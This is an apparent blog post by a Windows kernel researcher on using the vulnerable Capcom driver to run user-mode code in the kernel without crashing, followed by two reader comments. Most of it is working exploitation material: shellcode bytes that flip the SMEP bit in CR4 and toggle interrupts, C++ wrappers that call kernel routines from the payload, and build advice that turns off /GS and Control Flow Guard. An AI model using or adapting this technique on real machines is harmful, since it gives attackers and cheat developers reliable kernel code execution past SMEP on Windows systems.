Escaping SMEP Hell: Exploiting Capcom Driver In a Safe Manner

Trapped in a SMEP-disabled payload, unable to do anything reliably? You have come to the right place.

I’ve seen so many people using the Capcom driver in an unsafe manner that I wanted to write this post, explaining why some practices are incredibly unsafe and how we can fix them. When these problems are pointed out, the reply most of the time is “works on my machine /shrug”, but when you are not the only user you are setting yourself up for failure (speaking from personal experience). It is true that the Capcom driver is inherently unsafe; however, with certain changes we can make it much more reliable.

There are two ways I’ve seen the Capcom driver being used:
1) Stay _disable()’d and pray the NT routines with IRQL requirements somehow work.
2) Call _enable() and pray no context switch happens / PatchGuard doesn’t get angry.

The problem with enabling interrupts is that a context switch might happen during execution. Windows assumes every core has the same CR4 value and does not save or restore it per thread, so our thread can resume on another core where SMEP is still enabled. When we then return to our code in user-mode, we are going to bug-check. But we still need interrupts to be enabled to call certain functions in the kernel, so we don’t have a choice… or do we?

Yes, we do: we can rely on a small trick, specifically a property of ExAllocatePoolWithTag.

When we make a small allocation (0xFE0 bytes or less, as the check below shows) from a non-special pool, ExAllocatePoolWithTag only allocates new pages if it can neither find a free block of our size nor split a larger block to satisfy the request, which in practice never happens. Luckily for us, this small-allocation path does not require interrupts to be enabled.

PVOID __stdcall ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag)
{
  ...
  if ( !MmSpecialPoolTag || !ExpUseSpecialPool(NumberOfBytes_, (unsigned int)v10) )
  {
LABEL_10:
    if ( NumberOfBytes_ > 0xFE0 )
    {
      result = (PVOID)ExpAllocateBigPool(0i64, v5, NumberOfBytes_, v10, 0);
      if ( result )
        return result;
      goto LABEL_260;
    }
    ...
    // Proceeds to allocate a small pool ...
    ...
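
The size check in the excerpt above can be restated as a tiny helper. This is only a sketch of that one comparison, not of the allocator itself; `kSmallPoolLimit` and `TakesBigPoolPath` are hypothetical names introduced here for illustration.

```cpp
#include <cassert>
#include <cstddef>

// Threshold taken from the decompiled check above: NumberOfBytes_ > 0xFE0.
constexpr std::size_t kSmallPoolLimit = 0xFE0;

// Hypothetical helper: true when a request of this size would be routed to
// ExpAllocateBigPool instead of the small-pool path.
constexpr bool TakesBigPoolPath(std::size_t numberOfBytes)
{
    return numberOfBytes > kSmallPoolLimit;
}

// A stub of a few dozen bytes stays on the small-pool path...
static_assert(!TakesBigPoolPath(60), "small stub must not hit the big-pool path");
// ...while a 1 MiB request does not, so it should not be made with interrupts disabled.
static_assert(TakesBigPoolPath(0x100000), "1 MiB request takes the big-pool path");
```

This is why the stub itself can be allocated while interrupts are still disabled, whereas a large allocation should be made through the stub once it exists.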

We are going to allocate a stub in kernel memory that executes these calls for us.

0x0F, 0x20, 0xE0,                                // mov    rax,cr4               ; -
0x48, 0x0F, 0xBA, 0xE8, 0x14,                    // bts    rax,0x14              ; | will be nop'd if no SMEP support
0x0F, 0x22, 0xE0,                                // mov    cr4,rax               ; -
0xFB,                                            // sti
0x48, 0x8D, 0x05, 0x07, 0x00, 0x00, 0x00,        // lea    rax,[rip+0x7]         ; continue
0x8F, 0x40, 0x12,                                // pop    QWORD PTR [rax+0x12]  ; ret_store
0x50,                                            // push   rax
0xFF, 0x60, 0x1A,                                // jmp    QWORD PTR [rax+0x1a]  ; call_store
0xFA,                                            // cli
0x0F, 0x20, 0xE1,                                // mov    rcx,cr4
0x48, 0x0F, 0xBA, 0xF1, 0x14,                    // btr    rcx,0x14
0x0F, 0x22, 0xE1,                                // mov    cr4,rcx
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,              // jmp    QWORD PTR [rip+0x0]   ; ret_store

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // ret_store:  dq 0
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // call_store: dq 0

This small stub enables SMEP and interrupts, saves the return address into ret_store, replaces it with the address of our epilogue (which disables interrupts and SMEP again, then jumps to the saved address), and jumps to the procedure stored in call_store.
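
The displacements in the stub (0x7, 0x12, 0x1a) can be checked by counting instruction lengths. The sketch below does that in plain user-mode C++ without executing the bytes. The constant names are hypothetical; the offsets are derived from the listing above and are only assumed to correspond to Kh_PassiveCallStubSmepEnabledOffset and Kh_PassiveCallStubCallStoreOffset in the repository.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Stub bytes copied from the listing above.
static const std::uint8_t StubBytes[] = {
    0x0F, 0x20, 0xE0,                                // mov rax, cr4
    0x48, 0x0F, 0xBA, 0xE8, 0x14,                    // bts rax, 0x14
    0x0F, 0x22, 0xE0,                                // mov cr4, rax
    0xFB,                                            // sti
    0x48, 0x8D, 0x05, 0x07, 0x00, 0x00, 0x00,        // lea rax, [rip+0x7]
    0x8F, 0x40, 0x12,                                // pop qword ptr [rax+0x12]
    0x50,                                            // push rax
    0xFF, 0x60, 0x1A,                                // jmp qword ptr [rax+0x1a]
    0xFA,                                            // cli  <- "continue"
    0x0F, 0x20, 0xE1,                                // mov rcx, cr4
    0x48, 0x0F, 0xBA, 0xF1, 0x14,                    // btr rcx, 0x14
    0x0F, 0x22, 0xE1,                                // mov cr4, rcx
    0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,              // jmp qword ptr [rip+0x0]
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // ret_store
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // call_store
};

// Offsets derived by summing instruction lengths (hypothetical names).
constexpr std::size_t kSmepPrologueSize = 3 + 5 + 3;            // bytes NOP'd without SMEP
constexpr std::size_t kLeaEnd           = kSmepPrologueSize + 1 + 7;
constexpr std::size_t kContinueOffset   = kLeaEnd + 3 + 1 + 3;  // pop, push, jmp
constexpr std::size_t kRetStoreOffset   = kContinueOffset + 0x12;
constexpr std::size_t kCallStoreOffset  = kContinueOffset + 0x1A;

static_assert(sizeof(StubBytes) == kCallStoreOffset + sizeof(std::uint64_t),
              "call_store must be the last qword of the stub");

// Decodes the lea's rip-relative displacement and returns the offset it points at.
inline std::size_t LeaTargetOffset()
{
    const std::uint8_t* disp = StubBytes + kLeaEnd - 4;
    const std::uint32_t value = static_cast<std::uint32_t>(disp[0]) |
                                (static_cast<std::uint32_t>(disp[1]) << 8) |
                                (static_cast<std::uint32_t>(disp[2]) << 16) |
                                (static_cast<std::uint32_t>(disp[3]) << 24);
    return kLeaEnd + value;
}
```

If any instruction in the stub is changed, these are the numbers that have to be recomputed, since the epilogue finds ret_store and call_store purely by displacement.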

We are going to initialize and call it like below:

NON_PAGED_CODE static void Khk_AllocatePassiveStub()
{
  PVOID Out = ( PVOID ) Khk_ExAllocatePool( 0ull, sizeof( Kh_PassiveCallStubData ) );
  Np_memcpy( Out, Kh_PassiveCallStubData, sizeof( Kh_PassiveCallStubData ) );
  Khk_PassiveCallStub = ( fnPassiveCall ) Out;
}

template<typename ...Params>
NON_PAGED_CODE static uint64_t Khk_CallPassive( PVOID Ptr, Params &&... params )
{
  *( PVOID* ) ( ( ( PUCHAR ) Khk_PassiveCallStub ) + Kh_PassiveCallStubCallStoreOffset ) = Ptr;
  return Khk_PassiveCallStub( std::forward<Params>( params ) ... );
}

static void Khu_Init( CapcomContext* CpCtx, KernelContext* KrCtx )
{
  int CpuInfo[ 4 ];
  __cpuid( CpuInfo, 0x7 );
  
  if ( !( CpuInfo[ 1 ] & ( 1 << 7 ) ) ) // EBX : 1 << 7 = SMEP
  {
    printf( "[+] No SMEP support!\n" );
    memset( Kh_PassiveCallStubData, 0x90, Kh_PassiveCallStubSmepEnabledOffset );
  }

  Khk_ExAllocatePool = KrCtx->GetProcAddress<fnFreeCall>( "ExAllocatePool" );
  CpCtx->ExecuteInKernel( Khk_AllocatePassiveStub );
}

// Example usage

Khu_Init( CpCtx, KrCtx );
...
CpCtx->ExecuteInKernel( NON_PAGED_LAMBDA()
{
  ...
  Khk_CallPassive( DbgPrint, ... );
  ...
} );
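
The SMEP check in Khu_Init boils down to testing one CPUID bit and overwriting the stub's prologue with NOPs when it is clear. Below is a minimal user-mode sketch of that logic on a copy of the bytes. `HasSmep` and `PrepareStub` are hypothetical helpers, and the EBX value is passed in as a parameter rather than read with `__cpuid` so the logic can be exercised on any machine.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

constexpr std::uint32_t kLeaf7EbxSmepBit = 1u << 7;  // CPUID.(EAX=7,ECX=0):EBX bit 7
constexpr std::uint8_t  kNop             = 0x90;

// True when the EBX value returned by CPUID leaf 7 reports SMEP support.
inline bool HasSmep(std::uint32_t leaf7Ebx)
{
    return (leaf7Ebx & kLeaf7EbxSmepBit) != 0;
}

// Returns a copy of the stub; when SMEP is unsupported, the first
// prologueSize bytes (mov/bts/mov on CR4) are replaced with NOPs.
inline std::vector<std::uint8_t> PrepareStub(std::vector<std::uint8_t> stub,
                                             std::uint32_t leaf7Ebx,
                                             std::size_t prologueSize)
{
    if (!HasSmep(leaf7Ebx) && prologueSize <= stub.size())
        std::fill_n(stub.begin(), prologueSize, kNop);
    return stub;
}
```

Only the prologue needs patching: the epilogue's btr clears a bit that is already zero on CPUs without SMEP, so it can stay as it is.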

Although this is not thread-safe (the stub keeps a single ret_store/call_store pair), it doesn’t really matter to us. Now that we can call functions that require interrupts to be enabled, all we need to do is make sure our own code also runs fine while interrupts are disabled. To achieve this, we are simply going to use separate code and data sections for anything kernel-related, VirtualLock them so the pages cannot be paged out, and make sure our code does not access any memory that can be paged out. (You can check the GitHub repo below for the implementation details; and no, NtLockVirtualMemory is not a no-op.)

Here’s an example:

#include <cstdio>
#include <iostream>
#include <assert.h>
#include "LockedMemory.h"
#include "KernelRoutines.h"
#include "CapcomLoader.h"
#include "KernelHelper.h"

int main()
{
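  // Do not wrap this call in assert(): release builds define NDEBUG,
  // which would compile the call away and leave the sections unlocked.
  if ( !Np_LockSections() )
    return 1;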
  
  KernelContext* KrCtx = Kr_InitContext();
  CapcomContext* CpCtx = Cl_InitContext();

  // Checked explicitly because assert() is a no-op in release builds
  if ( !CpCtx || !KrCtx )
    return 1;

  Khu_Init( CpCtx, KrCtx );
  printf( "[+] Khk_PassiveCall @ %16llx\n", Khk_PassiveCallStub );

  NON_PAGED_DATA static char Format[] = "Jearning how to count: %s %s %s %s %d %d...";
  NON_PAGED_DATA static auto DbgPrint = KrCtx->GetProcAddress<>( "DbgPrint" );
  NON_PAGED_DATA static PVOID AllocatedMemory = 0;

  CpCtx->ExecuteInKernel( NON_PAGED_LAMBDA()
  {
    // When you do something that requires interrupts to be enabled (such as a big memory allocation), use Khk_CallPassive
    PVOID Out = ( PVOID ) Khk_CallPassive( Khk_ExAllocatePool, 0ull, 0x100000 );
    // Do not use memcpy, memset or ZeroMemory in kernel context; use Np_XXX equivalents
    Np_ZeroMemory( Out, 0x100000 );

    // Make sure all the UM data you reference from kernel has NON_PAGED_DATA prefix
    AllocatedMemory = Out;
    Format[ 0 ] = 'L';

    // Do not call _enable()
    // _enable();

    // When you require a kernel api to be called use KrCtx to get it BEFORE you are in kernel context.
    // MmGetSystemRoutineAddress requires IRQL==PASSIVE_LEVEL; handing it to the payload is bad engineering on Capcom's side.

    // You can use data without NON_PAGED_DATA prefix in Khk_CallPassive though. (the strings in this case)
    Khk_CallPassive( DbgPrint, Format, "1", "2", "3", "4", 5ull, 6ull );
    // Make sure you specify the sizes for the integers (5ull instead of 5)
  } );

  printf( "[+] AllocatedMemory @ %16llx\n", AllocatedMemory );

  Cl_FreeContext( CpCtx );
  Kr_FreeContext( KrCtx );
  
  return 0;
}
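
The Np_XXX helpers used in the example exist so that the kernel-context code never calls into the CRT. The sketch below shows the general idea with portable byte loops; it is not the repository's implementation (which, per the guidelines below, uses movsb/stosb), and `Sketch_memcpy` and `Sketch_memset` are hypothetical names. The `volatile` qualifiers are an assumption on my part to discourage the compiler from turning the loops back into memcpy/memset calls.

```cpp
#include <cassert>
#include <cstddef>

// Byte-wise copy with no CRT dependency (stand-in for a rep movsb based Np_memcpy).
inline void* Sketch_memcpy(void* dst, const void* src, std::size_t count)
{
    volatile unsigned char* d = static_cast<unsigned char*>(dst);
    const volatile unsigned char* s = static_cast<const unsigned char*>(src);
    while (count--)
        *d++ = *s++;
    return dst;
}

// Byte-wise fill with no CRT dependency (stand-in for a rep stosb based Np_memset).
inline void* Sketch_memset(void* dst, int value, std::size_t count)
{
    volatile unsigned char* d = static_cast<unsigned char*>(dst);
    while (count--)
        *d++ = static_cast<unsigned char>(value);
    return dst;
}
```

In the real project these would also need to live in the locked, non-paged code section, like everything else that runs in kernel context.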

Here’s the final wrapper: GitHub

Guidelines for safe code:

– Use Np_ZeroMemory (stosb) instead of ZeroMemory
– Use Np_memcpy (movsb) instead of memcpy
– Use Np_memset (stosb) instead of memset
– Disable Security Checks (/GS-)
– Disable Control Flow Guard
– Don’t compile in debug mode
– Don’t use any functions that are not NON_PAGED_CODE prefixed (INCLUDING CRT AND STD!)
– Wrap all lambdas with NON_PAGED_LAMBDA
– Make sure all the variables you reference are prefixed NON_PAGED_DATA, unless you are doing so from Khk_CallPassive
– Do not call any ntoskrnl routines with IRQL requirements directly; call them through Khk_CallPassive instead
– Do not enable interrupts
– Get the procedures you need using KrCtx->GetProcAddress<>(…) outside of kernel context
– Invoke nt!memcpy from Khk_CallPassive if you need to copy paged memory
– fnFreeCall and fnPassiveCall are convenient wrappers I use, but they require you to specify integer sizes explicitly (e.g. 0ull instead of 0). Otherwise the argument is passed with the smallest size possible and you end up with garbage in the higher bytes
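
The last guideline follows from how variadic templates deduce argument types: a bare 0 or 5 is forwarded as an int, not as a 64-bit value. The sketch below makes that visible by reporting the size of each forwarded argument. `ForwardedSizes` is a hypothetical helper written for this illustration, not part of the wrapper.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <type_traits>

// Reports the size in bytes of each argument as a variadic wrapper would
// deduce it, in the same way Khk_CallPassive deduces its Params pack.
template <typename... Params>
constexpr std::array<std::size_t, sizeof...(Params)> ForwardedSizes(Params&&...)
{
    return {{ sizeof(std::remove_reference_t<Params>)... }};
}
```

Calling `ForwardedSizes(5, 5ull)` yields `sizeof(int)` for the first argument and `sizeof(unsigned long long)` for the second. When the callee expects a 64-bit parameter, only the low bytes of the narrower argument are guaranteed to be written, which matches the garbage higher bytes described above.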


I'm an independent security researcher and a self-employed reverse engineer; mostly interested in Windows kernel development, low-level programming, and pen-testing anti-cheat, anti-debug, anti-re and anti-tampering software but I also occasionally do machine learning research and GPU accelerated programming.

4 Comments

  1. weizehua

    Hi, I’m new to the Windows kernel.
    How do you know that after a context switch, CR0 will be reset?
    I am curious about which registers are reset and which are not. Could you tell me something about it?

    1. Can Bölük (post author)

      “Reset” was a bad word choice on my side.

      The issue with changing control registers is that Windows assumes every CPU will have the same CRn values.
      When a context switch happens, it will not bother saving the old CRn values of the thread and restoring them later on.

      So if you are unfortunate enough, your thread might get switched to another CPU core and you will all of a sudden have the CRn values you changed “reset”. SMEP will re-activate in our case.
